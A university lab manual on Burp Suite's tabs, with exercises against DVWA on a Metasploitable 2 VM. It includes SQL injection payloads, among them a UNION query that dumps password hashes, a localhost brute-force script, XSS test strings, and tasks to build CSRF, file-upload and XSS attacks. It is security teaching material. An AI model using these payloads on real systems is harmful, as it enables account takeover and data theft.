Burp Manual

Lab 7 provides an overview of Burp Suite, a tool for web vulnerability scanning and penetration testing, detailing its various tabs and functionalities such as Dashboard, Target, Proxy, and Intruder. The lab includes practical tasks involving SQL injection, CSRF, XSS attacks, and using features like the Repeater and Comparer tabs to analyze and manipulate HTTP requests. Participants are encouraged to explore Burp Suite further to enhance their skills in identifying and exploiting web application vulnerabilities.

Uploaded by k224728
Copyright © All Rights Reserved

Lab 7

Burp Suite is a widely used web vulnerability scanner and penetration testing tool developed by
PortSwigger. It provides a comprehensive suite of tools for security professionals to identify,
exploit, and remediate vulnerabilities in web applications.

Log in to both machines (the attacker VM and the Metasploitable 2 target).

Check connectivity with the Metasploitable 2 machine (for example, ping its IP address from the attacker VM).

Burp Suite needs a Java runtime; install it with:

sudo apt install openjdk-17-jdk

Then launch Burp Suite.
1. Dashboard Tab

● Purpose: Centralized control for managing scans and displaying information.


● Key Features:
○ View ongoing scans, issues, and logs.
○ Monitor the status of different tools within Burp Suite.
● Usage:
○ Monitor the progress of active scans.
○ Review vulnerabilities and detailed reports.
2. Target Tab

● Purpose: Maps and organizes information about the application being tested.
● Key Features:
○ Site Map: Displays a hierarchical structure of the application's endpoints.
○ Target Scope: Allows you to define which endpoints should be tested.
● Usage:
○ Analyze all discovered URLs and endpoints.
○ Identify important files, directories, and query parameters.
○ Use it to focus your testing only on in-scope items.
Open the DVWA app in the browser (it is hosted on the Metasploitable 2 machine).
Username: admin, password: password

Follow the steps for the SQL injection attack: set the DVWA security level to low, open the SQL Injection module, submit a User ID, intercept the request in Proxy, send it to Repeater and replace the id parameter with an injection payload.

Successful SQL injection, both by typing the payload into the form and by editing the request in Repeater
3. Proxy Tab

● Purpose: Intercepts and manipulates HTTP/S traffic between your browser and the
server.
● Key Features:
○ Intercept: Captures requests for manual modification.
○ HTTP History: Logs all traffic passing through the proxy.
○ Options: Configure proxy listeners and rules.
● Usage:
○ Point the browser at the proxy listener (default 127.0.0.1:8080). For HTTPS targets, install Burp's CA certificate (downloadable from http://burpsuite while proxying) so TLS traffic can be intercepted without certificate warnings.
○ Modify requests in real-time using the Intercept feature.
○ Monitor and analyze all traffic in the HTTP History tab.
○ Adjust proxy settings to suit specific testing needs.
4. Sequencer Tab

● Purpose: Analyzes the randomness of tokens, such as session cookies.


● Key Features:
○ Collect tokens from the server.
○ Test token entropy and randomness.
● Usage:
○ Check if session cookies or CSRF tokens are predictable.
○ Ensure sufficient randomness in security-critical tokens. Capture several hundred to a few thousand tokens before drawing conclusions; a handful of samples says nothing about the generator.
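
The following is an added example, not code from the lab or from Burp Suite, showing in miniature what Sequencer measures. Two constructed token sets are analysed: a predictable scheme (a hex-encoded counter, as a naive session ID might be generated) and tokens from Python's secrets module. position_entropy() gives the mean Shannon entropy per character position in bits (the maximum for hex characters is 4.0), and is_counter() detects a constant step between consecutive tokens. Sequencer runs many more statistical tests than this; the point is that a token can look random yet be trivially predictable.

```python
"""Added example (not from the lab): a minimal token-randomness check in the
spirit of Burp Sequencer. Both token sets below are constructed for the example."""
import math
import secrets
from collections import Counter


def predictable_tokens(n, start=1000):
    """A naive session ID: a counter, zero-padded to 32 hex characters."""
    return [f"{start + i:032x}" for i in range(n)]


def random_tokens(n):
    """Tokens from a CSPRNG, 128 bits each, as a session ID should be."""
    return [secrets.token_hex(16) for _ in range(n)]


def position_entropy(tokens):
    """Mean Shannon entropy (bits) of the characters at each position.
    Constant positions contribute 0; uniformly random hex contributes ~4."""
    width = len(tokens[0])
    n = len(tokens)
    total = 0.0
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total += -sum(c / n * math.log2(c / n) for c in counts.values())
    return total / width


def is_counter(tokens):
    """True if every consecutive pair of tokens differs by the same integer step,
    i.e. the next token can be predicted from the current one."""
    values = [int(t, 16) for t in tokens]
    steps = {b - a for a, b in zip(values, values[1:])}
    return len(steps) == 1


if __name__ == "__main__":
    for name, toks in (("counter", predictable_tokens(200)), ("csprng", random_tokens(200))):
        print(f"{name:8s} entropy/char={position_entropy(toks):.2f} bits  sequential={is_counter(toks)}")
```

The per-position view is what Sequencer's character-level analysis shows: a counter has near-zero entropy in every position except the last few, even though each token is 32 "random-looking" hex characters.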
5. Intruder Tab

● Purpose: Automates customized attacks, such as brute force or fuzzing.


● Key Features:
○ Positions: Defines which part of the request should be attacked.
○ Payloads: Configures input values for the attack.
○ Options: Fine-tunes attack settings like threading and session handling.
● Usage:
○ Perform brute force attacks on login forms.
○ Test parameter values with SQL injection or XSS payloads.
○ Fuzz endpoints to find vulnerabilities.

Send the login request to Intruder (right-click the request > Send to Intruder)
Go to the Intruder tab

In Positions, click Clear §, select the password value and click Add § (Auto § marks every parameter, which is more than a password-only Sniper attack needs)

Under Payloads, load a password wordlist, then start the attack. The correct password shows a different response length (or status code) from all the wrong guesses; sort the results table by Length to spot it. Note that the Community Edition rate-limits Intruder, so keep the wordlist short.
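
As an added example (not code from the lab or from Burp Suite), the procedure above reproduced in Python: a throw-away local HTTP server imitates DVWA's Brute Force module (GET /vulnerabilities/brute/?username=..&password=..&Login=Login) and accepts the constructed credential admin/password; sniper_attack() substitutes every payload into the single position marked with § and records the status code and response length, the two columns a tester sorts on in Intruder's results table. The server, the credential and the wordlist are all constructed for the example.

```python
"""Added example (not from the lab): a miniature Intruder 'Sniper' attack
against a mock of DVWA's brute-force page, run entirely on localhost."""
import threading
from collections import Counter
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode, urlparse
from urllib.request import urlopen

VALID = {"admin": "password"}  # assumed target credential (DVWA's default account)


class MockBruteForce(BaseHTTPRequestHandler):
    """Mimics DVWA's low-level brute force page: the same 200 status for a hit
    and a miss, only the page body (and therefore its length) differs."""

    def do_GET(self):
        q = parse_qs(urlparse(self.path).query)
        user = q.get("username", [""])[0]
        password = q.get("password", [""])[0]
        if VALID.get(user) == password:
            body = b"<p>Welcome to the password protected area admin</p>"
        else:
            body = b"<pre><br />Username and/or password incorrect.</pre>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_mock_server():
    """Bind to a free loopback port and serve in a background thread."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockBruteForce)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def sniper_attack(base_url, template, payloads):
    """template maps query parameters to values; exactly one value must be the
    position marker '§' (Burp's notation). Returns one result per payload."""
    positions = [k for k, v in template.items() if v == "§"]
    if len(positions) != 1:
        raise ValueError("Sniper needs exactly one payload position")
    results = []
    for payload in payloads:
        params = dict(template, **{positions[0]: payload})
        url = f"{base_url}/vulnerabilities/brute/?{urlencode(params)}"
        with urlopen(url) as resp:
            body = resp.read()
        results.append({"payload": payload, "status": resp.status, "length": len(body)})
    return results


def find_outliers(results):
    """Responses whose length differs from the most common one. With a wordlist
    of wrong guesses and a single hit, the outlier is the hit."""
    common_length = Counter(r["length"] for r in results).most_common(1)[0][0]
    return [r for r in results if r["length"] != common_length]


if __name__ == "__main__":
    server = start_mock_server()
    base = f"http://127.0.0.1:{server.server_port}"
    wordlist = ["123456", "letmein", "password", "admin", "qwerty"]  # constructed
    results = sniper_attack(base, {"username": "admin", "password": "§", "Login": "Login"}, wordlist)
    for r in results:
        print(r)
    print("hit:", [r["payload"] for r in find_outliers(results)])
    server.shutdown()
```

Against the real DVWA page the status code is 200 for every guess, which is why length (or a grep match on "Welcome") is the discriminator rather than status.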
6. Repeater Tab
● Purpose: Manually modify and resend individual HTTP requests.
● Key Features:
○ Send and analyze responses for different request variations.
○ View raw requests and responses side-by-side.
● Usage:
○ Test payloads like ' OR '1'='1 for SQL Injection manually.
○ Explore how different inputs affect server behavior.
○ Use it to verify vulnerabilities without automation.
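
The SQL injection step earlier in the lab and the Repeater payload ' OR '1'='1 above both rely on the same defect, reproduced here as an added example (not code from the lab or from DVWA) against an in-memory SQLite copy of a DVWA-like users table. DVWA's low-security SQL Injection module builds its query by string concatenation; lookup_vulnerable() does the same, while lookup_safe() binds the value as a parameter. The table contents are constructed for the example, and the comment sequence is SQLite's "-- " (DVWA runs on MySQL, where # also works).

```python
"""Added example (not from the lab): the DVWA-style query, injectable and
parameterised, against a constructed SQLite users table."""
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for DVWA's users table (passwords stored as MD5)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)"
    )
    rows = [
        (1, "admin", "admin", "admin", "password"),
        (2, "Gordon", "Brown", "gordonb", "abc123"),
        (3, "Hack", "Me", "1337", "charley"),
    ]
    db.executemany(
        "INSERT INTO users VALUES (?,?,?,?,?)",
        [(i, f, l, u, hashlib.md5(p.encode()).hexdigest()) for i, f, l, u, p in rows],
    )
    return db


def lookup_vulnerable(db, user_id):
    """Mirrors the low-level module: the input lands inside the quotes unescaped,
    so a quote in the payload ends the literal and the rest is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


def lookup_safe(db, user_id):
    """Bound parameter: the payload is compared as one literal string and is
    never parsed as SQL, so the same inputs return nothing."""
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ["1", "' OR '1'='1", "1' UNION SELECT user, password FROM users -- "]:
        print(repr(payload))
        print("  vulnerable:", lookup_vulnerable(db, payload))
        print("  safe      :", lookup_safe(db, payload))
```

The UNION payload is the one worth trying in Repeater after the tautology works: it turns the two-column "first name, last name" output into a dump of the username and password hash columns.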

7. Decoder Tab

● Purpose: Encodes and decodes data in various formats.


● Key Features:
○ Supports encoding/decoding for Base64, URL, HTML, Hex, ASCII and more, and hashing.
○ Transformations can be chained, and Smart decode guesses and applies successive decodings automatically.
● Usage:
○ Decode Base64 strings from responses or requests.
○ Encode payloads in formats like URL or Hex before sending them.
○ Unpack obfuscated parameters in traffic, which are often encoded more than once.
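
As an added example (not code from the lab or from Burp Suite), a small "smart decode" in the spirit of Decoder's automatic mode: each pass applies the first encoding whose signature matches and repeats until nothing changes. The sample value is constructed for the example (an XSS payload URL-encoded and then Base64-encoded), and the detection order is a heuristic, so a short value that happens to be valid hex or Base64 can be mis-identified; Decoder has the same limitation, which is why it lets you pick the encoding manually.

```python
"""Added example (not from the lab): layered decoding with encoding detection."""
import base64
import binascii
import html
import re
from urllib.parse import quote, unquote

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
HEX = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
URL_ESC = re.compile(r"%[0-9a-fA-F]{2}")
HTML_ENT = re.compile(r"&(#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);")


def decode_once(s):
    """Return (kind, decoded) for the first recognised encoding, or (None, s)."""
    if URL_ESC.search(s):
        return "url", unquote(s)
    if HTML_ENT.search(s):
        return "html", html.unescape(s)
    if HEX.fullmatch(s):
        try:
            return "hex", bytes.fromhex(s).decode("utf-8")
        except UnicodeDecodeError:
            pass  # hex-looking but not text: fall through
    if len(s) % 4 == 0 and B64.fullmatch(s):
        try:
            out = base64.b64decode(s, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None, s
        if out.isprintable():
            return "base64", out
    return None, s


def smart_decode(s, max_rounds=8):
    """Peel encodings until none is recognised; returns (plaintext, layers)."""
    layers = []
    for _ in range(max_rounds):
        kind, out = decode_once(s)
        if kind is None or out == s:
            break
        layers.append(kind)
        s = out
    return s, layers


PAYLOAD = "<script>alert(1)</script>"  # constructed test value
SAMPLE = base64.b64encode(quote(PAYLOAD, safe="").encode()).decode()  # URL-encoded, then Base64

if __name__ == "__main__":
    print(SAMPLE)
    print(smart_decode(SAMPLE))
    print(smart_decode("&lt;img src=x onerror=alert(1)&gt;"))
```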
8. Comparer Tab

● Purpose: Compares requests, responses, or any other text data.


● Key Features:
○ Highlights differences between two pieces of data.
○ Useful for analyzing subtle changes.
● Usage:
○ Compare responses from different payloads to spot patterns.
○ Analyze how server responses change based on input.

9. Scanner (Burp Suite Professional Only)

● Purpose: Automatically scans for vulnerabilities in the target application. In Burp Suite 2.x there is no separate Scanner tab: scans are started from the Dashboard (New scan) or from the site map (right-click > Scan), and findings appear under Issue activity on the Dashboard. The Community Edition does not include the scanner.


● Key Features:
○ Detects common vulnerabilities like XSS, SQLi, and CSRF.
○ Provides detailed reports of findings.
● Usage:
○ Run automated scans on specific endpoints.
○ Use it to find low-hanging vulnerabilities quickly.

10. Logger Tab


● Purpose: Logs all traffic flowing through Burp Suite, from every tool (Proxy, Repeater, Intruder, Scanner), not only the Proxy history.
● Key Features:
○ Provides a simple, real-time log of HTTP requests and responses.
● Usage:
○ Review all requests and responses during a session.
○ Use it as a quick reference for debugging issues.

Target page for Task 1: http://<ip address>/dvwa/vulnerabilities/csrf/

Note: if I wanted to, I could attach screenshots of these tasks here, but I want you to explore Burp Suite yourself, and remember: if you don't challenge yourself, you will never improve.

TASK 1
Create a CSRF attack that silently changes the admin's password on DVWA to rollnoabc when the admin opens a malicious link. Also compare the password-change responses in the Comparer tab of Burp Suite and note what you find.

TASK 2
Perform a file upload attack on DVWA.

TASK 3
Perform an XSS attack on DVWA.
